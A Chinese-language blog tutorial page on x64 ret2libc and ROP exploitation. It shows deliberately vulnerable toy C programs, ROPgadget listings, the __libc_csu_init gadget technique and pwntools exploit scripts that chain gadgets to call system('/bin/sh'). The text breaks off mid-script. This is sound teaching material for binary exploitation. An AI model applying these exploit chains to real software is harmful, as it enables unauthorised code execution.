<!DOCTYPE html>

<!--
  portfolYOU Jekyll theme by Youssef Raafat
  Free for personal and commercial use under the MIT license
  https://github.com/YoussefRaafatNasry/portfolYOU
-->

<html lang="en" class="h-100">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content=""循此苦旅，以达星辰"">

  <title>Yvan's blog</title>
  <link rel="shortcut icon" type="image/x-icon" href="/assets/favicon.ico">

  <!-- Font Awesome CDN -->
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css">

  <!-- Bootstrap CSS CDN -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">

  <!-- Animate CSS CDN -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.0/animate.css" type="text/css"/>
  
  <!-- Custom CSS -->
  <link rel="stylesheet" href="/assets/css/style.css" type="text/css">

  <!-- Mathjax for latex -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>

  <!-- comment system -->
  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>

</head>


<body class="d-flex flex-column h-100">

  <main class="flex-shrink-0 container mt-5">
  <nav class="navbar navbar-expand-lg navbar-light">

  <a class="navbar-brand" href="/"><h5><b>Yvan's blog</b></h5></a>

  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>

  <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
    <div class="navbar-nav ml-auto"><a class="nav-item nav-link " href="/projects/">Projects</a>

      <a class="nav-item nav-link active" href="/blog/">Blog</a>

      <a class="nav-item nav-link " href="/link/">Link</a>

      <a class="nav-item nav-link " href="/about/">About</a>

      <a class="nav-item nav-link " href="/about_en/">AboutEN</a>

      

    </div>
  </div>

</nav>
  <div class="col-lg-10 mx-auto mt-5 post">
  <h1><b>关于libc与rop的思考</b></h1>

<p class="post-metadata text-muted">
  11 April 2019 -
  <b>12 mins read time</b>

  <br>Tags:
  
  <a class="text-decoration-none no-underline" href="/blog/tags#pwn">
    <span class="tag badge badge-pill text-primary border border-primary">pwn</span>
  </a>
  
  <a class="text-decoration-none no-underline" href="/blog/tags#binary">
    <span class="tag badge badge-pill text-primary border border-primary">binary</span>
  </a>
  </p>

<h3 id="那些奇妙的组合">那些奇妙的组合</h3>

<hr />

<p>  这两天读了一些书，学了一些新的知识，关于libc我们比较熟悉的是通过<strong>write()</strong> <strong>puts()</strong>等函数来泄漏<strong>system()</strong>和<strong>/bin/sh</strong>的实际地址，然后通过缓冲区溢出来进行利用，这是常见而基础的ret2libc。<br />
  但是我们来想想这几种情况，假如程序是64位那么我们如何将参数传入函数，假如我们没有拿到libc.so那么我们如何计算偏移，一般来说处理这中情况往往需要一些骚操作，以rop来实现libc泄漏往往是绕不过的。举个简单例子，在x86中write()传参是这样的：</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">'a'</span> <span class="o">*</span> <span class="mh">0x80</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">vuln</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">address_to_leak</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span>
</code></pre></div></div>
<p>  通过调用write函数来泄漏address_to_leak的真实地址，一般我们会选择write_got自己或者libc_start_main_got来进行泄漏，因为 <strong>延迟绑定</strong> 的原因，只有被调用过的函数，他的got表里才会储存该函数在内存中的实际地址。</p>

<blockquote>
  <p>关于这一部分大家可以读一度《程序员的自我修养这本书》，还有下面这篇文章：
<a href="https://www.freebuf.com/articles/system/135685.html">got&amp;plt</a><br />
详细的介绍了got与plt以及延迟绑定的问题</p>
</blockquote>

<p>  我们现在就来总结一下如何处理x64的libc泄漏问题。</p>

<h4 id="1直接寻找可用于传参的budget">1.直接寻找可用于传参的budget</h4>
<p>  既然要泄漏地址，那么必然要使用write()与puts()等函数，这个过程就涉及到参数的传递，不像x86那样可以用栈传递参数，x64拥有更多的寄存器，所以会优先选择使用寄存器来传递参数，关于寄存器我们需要将一下传参规则，先看下图：</p>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/register.png?raw=true" alt="register" /></p>

<p>  我们可以看到64位的程序的参数在6个以内时会优先调用寄存器，而使用的顺序如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="o">%</span><span class="n">rdi</span> <span class="o">=&gt;</span> <span class="n">arg1</span>
	
	<span class="o">%</span><span class="n">rsi</span> <span class="o">=&gt;</span> <span class="n">arg2</span>
	
	<span class="o">%</span><span class="n">rdx</span> <span class="o">=&gt;</span> <span class="n">arg3</span>
	
	<span class="o">%</span><span class="n">rcx</span> <span class="o">=&gt;</span> <span class="n">arg4</span>
	
	<span class="o">%</span><span class="n">r8</span> <span class="o">=&gt;</span> <span class="n">arg5</span>
	
	<span class="o">%</span><span class="n">r9</span> <span class="o">=&gt;</span> <span class="n">arg6</span>
</code></pre></div></div>

<p>  而 <strong><em>%rax</em></strong> 依旧用于保存返回值。知道这些储备知识以后，我们来开一个使用gadgets来控制程序的例子。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">systemaddr</span><span class="p">()</span>
<span class="p">{</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">dlopen</span><span class="p">(</span><span class="s">"libc.so.6"</span><span class="p">,</span> <span class="n">RTLD_LAZY</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">dlsym</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span><span class="s">"system"</span><span class="p">));</span>
    <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">vulnerable_function</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
    <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">systemaddr</span><span class="p">();</span>
    <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"Hello, World</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">13</span><span class="p">);</span>
    <span class="n">vulnerable_function</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<blockquote>
  <p>gcc -fno-stack-procter -no-pie -o rop_libc rop_libc1</p>
</blockquote>

<p>  我们首先可以看到一个明显的缓冲区溢出，而且程序会自动输出system()在内存中的实际地址，这个时候我们可以想到只需要拥有 <strong>“/bin/sh”</strong> 就可以走上人生巅峰，这个时候我们考虑使用gadgets来将 <strong>“/bin/sh”</strong> 的地址传入 <strong>rdi</strong>。ok，用ROPgadget来搜索一波：</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ROPgadget 	<span class="nt">--binary</span> rop_libc1  <span class="nt">--only</span> <span class="s2">"pop|ret"</span>
<span class="o">====================================================</span>
0x0000000000001294 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x0000000000001296 : pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x0000000000001298 : pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x000000000000129a : pop r15 <span class="p">;</span> ret
0x0000000000001293 : pop rbp <span class="p">;</span> pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x0000000000001297 : pop rbp <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x000000000000116f : pop rbp <span class="p">;</span> ret
0x000000000000129b : pop rdx <span class="p">;</span> ret
0x0000000000001299 : pop rsi <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x0000000000001295 : pop rsp <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x0000000000001016 : ret
0x0000000000001072 : ret 0x2f
0x000000000000119a : ret 0xfffe
</code></pre></div></div>
<p>  我们发现结果并不理想，由于这个程序太小了，里面竟然没有 <strong>pop rdi ; ret</strong> 这条指令，那么我们只好换个思路，为什么不直接使用libc.so里的gadgets呢？灵机一动之后，我们想到可用使用write()来泄漏libc.so里的指令地址，话不多说，先搜一下symbols地址：</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ROPgadget <span class="nt">--binary</span> libc.so.6 <span class="nt">--only</span> <span class="s2">"pop|ret"</span> 
<span class="o">=====================================================</span>
0x000000000002456f : pop rdi <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000023a5f : pop rdi <span class="p">;</span> ret
</code></pre></div></div>
<p>  果然命中注定的那个它出现了，**0x23a5f：pop rdi ; ret ** 就是我们想要的gadgets，我们可以构造rop链了。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">"a"</span> <span class="o">*</span> <span class="mh">0x80</span> <span class="o">+</span> <span class="s">'b'</span> <span class="o">*</span> <span class="s">'8'</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_ret_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span>
</code></pre></div></div>

<p>  但同时考虑到我们只需要执行system一次，所以似乎gadgets不含有ret也可以，那么我们的选择又多了一些：</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ROPgadget <span class="nt">--binary</span> libc.so.6 <span class="nt">--only</span> <span class="s2">"pop|call"</span>
<span class="o">====================================================</span>
0x00000000000bad0d : call qword ptr <span class="o">[</span>rdi]
0x0000000000027225 : call rdi
0x00000000000f982b : pop rax <span class="p">;</span> pop rdi <span class="p">;</span> call rax
0x00000000000f982c : pop rdi <span class="p">;</span> call rax
</code></pre></div></div>

<p>  这时候我们看到了 <strong>0x00f982b : pop rax ; pop rdi ; call rax</strong> 这行指令应该也是可以的，我们只需要构造payload如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">'a'</span> <span class="o">*</span> <span class="mh">0x80</span> <span class="o">+</span> <span class="s">'b'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_pop_call</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">)</span>
</code></pre></div></div>

<p>  此时system_addr被传入rax，bin_sh被传入rdi，最后调用call rax实现exploit，所以两条ROP都可以完成一次优雅的攻击，最终的exp如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">sh</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./rop_libc'</span><span class="p">)</span>

<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./libc.so'</span><span class="p">)</span>

<span class="n">vuln_addr</span> <span class="o">=</span> <span class="mh">0x000011db</span>

<span class="n">system_addr_str</span> <span class="o">=</span> <span class="n">sh</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
<span class="n">system_addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">system_addr_str</span><span class="p">,</span><span class="mi">16</span><span class="p">)</span>
<span class="k">print</span> <span class="s">"system_addr= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span>

<span class="n">pop_pop_call_offset</span> <span class="o">=</span> <span class="mh">0x00000000000f982b</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="k">print</span> <span class="s">"pop_offset= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">pop_pop_call_offset</span><span class="p">)</span>

<span class="n">bin_sh_offset</span> <span class="o">=</span> <span class="mh">0x0000000000181519</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span> <span class="c1"># libc.search('/bin/sh').next()
</span><span class="k">print</span> <span class="s">"bin_sh_offset= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">bin_sh_offset</span><span class="p">)</span>

<span class="n">pop_pop_call_addr</span> <span class="o">=</span> <span class="n">system_addr</span> <span class="o">+</span> <span class="n">pop_pop_call_offset</span>
<span class="k">print</span> <span class="s">"pop_addr= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">pop_pop_call_addr</span><span class="p">)</span>
<span class="c1">#pop_pop_call_addr = system_addr + pop_pop_call_offset
#print "pop_pop_call_addr = " + hex(pop_pop_call_addr)
</span>
<span class="n">bin_sh</span> <span class="o">=</span> <span class="n">system_addr</span> <span class="o">+</span> <span class="n">bin_sh_offset</span>
<span class="k">print</span> <span class="s">"bin_sh= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span> <span class="o">+</span>  <span class="n">p64</span><span class="p">(</span><span class="n">pop_pop_call_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">)</span>
<span class="c1">#payload = "a" * 0x80 + 'b' * '8' + p64(pop_ret_addr) + p64(bin_sh) + p64(system_addr)
</span>
<span class="n">sh</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> 

<span class="n">sh</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p><img src="https://github.com/Explainaur/hexo-blog/blob/master/source/pictures/rop_libc.png?raw=true" alt="result" /></p>

<h4 id="2通用gadgets">2.通用gadgets</h4>

<p>  假如我们出现了更艰难的情况，我们需要传入更多的参数进去，比如write(),这时候要怎么办？我们查一下libc.so发现什么都没有，有点难受：</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x0000000000106ab4 : pop r10 <span class="p">;</span> ret
0x0000000000024568 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000023a58 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x000000000006f529 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x000000000002fc29 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> ret
0x00000000000396f5 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000023f85 : pop r12 <span class="p">;</span> pop r13 <span class="p">;</span> ret
0x00000000000b5399 : pop r12 <span class="p">;</span> pop r14 <span class="p">;</span> ret
0x00000000000c513d : pop r12 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000024209 : pop r12 <span class="p">;</span> ret
0x000000000002456a : pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000023a5a : pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop r15 <span class="p">;</span> ret
0x000000000006f52b : pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x000000000002fc2b : pop r13 <span class="p">;</span> pop r14 <span class="p">;</span> ret
0x00000000000396f7 : pop r13 <span class="p">;</span> pop rbp <span class="p">;</span> ret
0x0000000000023f87 : pop r13 <span class="p">;</span> ret
</code></pre></div></div>

<p>  不太全但是可以发现几乎没有关于rdi等等有关参数的寄存器，这个时候我们就要采取一些骚办法.</p>

<blockquote>
  <p>__libc_csu_init</p>
</blockquote>

<p>  这个函数在大部分程序初始化的时候都会出现，我们首先来看一下这个函数的源码：</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> rop_libc
<span class="o">====================================================</span>

0000000000001240 &lt;__libc_csu_init&gt;:
    1240:       41 57                   push   %r15
    1242:       49 89 d7                mov    %rdx,%r15
    1245:       41 56                   push   %r14
    1247:       49 89 f6                mov    %rsi,%r14
    124a:       41 55                   push   %r13
    124c:       41 89 fd                mov    %edi,%r13d
    124f:       41 54                   push   %r12
    1251:       4c 8d 25 80 2b 00 00    lea    0x2b80<span class="o">(</span>%rip<span class="o">)</span>,%r12        <span class="c"># 3dd8 &lt;__frame_dummy_init_array_entry&gt;</span>
						
						..........
						<span class="c">#以下是关键</span>
    <span class="c">#gadget2</span>
    1278:       4c 89 fa                mov    %r15,%rdx
    127b:       4c 89 f6                mov    %r14,%rsi
    127e:       44 89 ef                mov    %r13d,%edi
    1281:       41 ff 14 dc             callq  <span class="k">*</span><span class="o">(</span>%r12,%rbx,8<span class="o">)</span>
    1285:       48 83 c3 01             add    <span class="nv">$0x1</span>,%rbx
    1289:       48 39 <span class="nb">dd                </span>cmp    %rbx,%rbp
    128c:       75 ea                   jne    1278 &lt;__libc_csu_init+0x38&gt;
    128e:       48 83 c4 08             add    <span class="nv">$0x8</span>,%rsp
   
   <span class="c">#gadget1</span>
   1292:       5b                      pop    %rbx
   1293:       5d                      pop    %rbp
   1294:       41 5c                 pop    %r12
   1296:       41 5d                pop    %r13
   1298:       41 5e                pop    %r14
   129a:       41 5f                 pop    %r15
   129c:       c3                      retq   <span class="c">#此处构造一些padding(7*8=56byte)就可以返回了</span>
</code></pre></div></div>

<p>  首先我们来看一下gadgets1，pop了一堆东西进到寄存器里，然后控制ret到gadget2,此时我们便可以看出其中的玄机，gadget1中pop进寄存器的值竟然被传进了我们梦寐以求的rdi rsi rdx 三个参数寄存器，然后接下来 <code class="language-plaintext highlighter-rouge">callq *(%r12,%rbx,8)</code> 会调用 <strong>[$r12 + rbx*8]</strong> 处的函数,之后进行 rbx += 1,然后比较rbx与rbp的值，如果想等那么就继续向下进行，并且ret到我们想要继续执行的位置。到这，我就可以开始思考如何给gadget1传参数了，反复思索后：</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$rbx</span> <span class="o">=</span> <span class="mi">0</span>

<span class="nv">$rbp</span> <span class="o">=</span> <span class="mi">1</span>

<span class="nv">$r12</span> <span class="o">=</span> <span class="n">callee</span> <span class="k">function</span>

<span class="nv">$r13</span> <span class="o">=</span> <span class="n">arg1</span>			<span class="nv">$r14</span> <span class="o">=</span> <span class="n">arg2</span>				<span class="nv">$r15</span> <span class="o">=</span> <span class="n">arg3</span>
</code></pre></div></div>
<blockquote>
  <p>这里需要注意的是需要构造56个padding，因为进行了6次pop和一次ret，使得rsp增大了56bytes。</p>
</blockquote>

<p>  这个时候我们精心设计的rop链就可以执行传递多个参数的复杂操作了。</p>

<p>  下面我们来看一道题：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">vulnerable_function</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
    <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">write</span><span class="p">(</span><span class="n">STDOUT_FILENO</span><span class="p">,</span> <span class="s">"Hello, World</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">13</span><span class="p">);</span>
    <span class="n">vulnerable_function</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<p>  乍一看除了write()和read()啥也没有，可以想到应该是libc泄漏，搜了一波发现没啥好用的gadgets，行吧，__libc_csu_init走起。由于write()函数被调用过，所以我们考虑根据write()来计算偏移：</p>

<p>  我们先构造payload1,利用write()函数来泄漏write自己在内存里的位置，然后返回到程序里，继续覆盖栈上的数据，直到回到main函数来继续进行后续操作：</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#get the address of write
</span><span class="n">payload1</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span>  <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span>
<span class="n">payload1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span> <span class="o">*</span> <span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
</code></pre></div></div>

<p>  当我们收到write的地址后，我们便能够计算出system()在内存中的地址了。我们便构造payload2使用read()函数来将算出的system()与/bin/sh写入bss段：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#get the address of system and bin_sh
</span><span class="n">payload2</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">read_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span><span class="o">*</span><span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
</code></pre></div></div>

<p>最后我们构造payload3,调用system()函数执行“/bin/sh”。注意，system()的地址保存在了.bss段首地址上，“/bin/sh”的地址保存在了.bss段首地址+8字节上。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#activate the system("/bin/sh")
</span><span class="n">payload3</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="o">+</span><span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span> <span class="o">*</span><span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
</code></pre></div></div>

<p>  最终的exp如下：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1">#r12 = ret_addr
</span>
<span class="c1">#r13 = rdi = arg1   r14 = rsi = arg2    r15 = rdx = arg3
</span>
<span class="c1">#rbx = 0    rbp = 1
</span>
<span class="n">sh</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./rop_libc1'</span><span class="p">)</span>

<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./rop_libc1'</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./libc.so'</span><span class="p">)</span>

<span class="n">main</span> <span class="o">=</span> <span class="mh">0x401153</span>
<span class="n">bss</span> <span class="o">=</span> <span class="mh">0x00000008</span>
<span class="n">read_got</span> <span class="o">=</span> <span class="mh">0x404020</span>

<span class="n">write_got</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'write'</span><span class="p">]</span>
<span class="k">print</span> <span class="s">"write_got= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span>
<span class="n">write_libc</span> <span class="o">=</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'write'</span><span class="p">]</span>
<span class="k">print</span> <span class="s">"write_libc= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">write_libc</span><span class="p">)</span>
<span class="n">system_libc</span> <span class="o">=</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="k">print</span> <span class="s">"system_libc= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">system_libc</span><span class="p">)</span>
<span class="n">bin_sh_libc</span> <span class="o">=</span> <span class="n">libc</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">'/bin/sh'</span><span class="p">).</span><span class="nb">next</span><span class="p">()</span>
<span class="k">print</span> <span class="s">"bin_sh_libc= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">bin_sh_libc</span><span class="p">)</span>

<span class="c1">#get the address of write
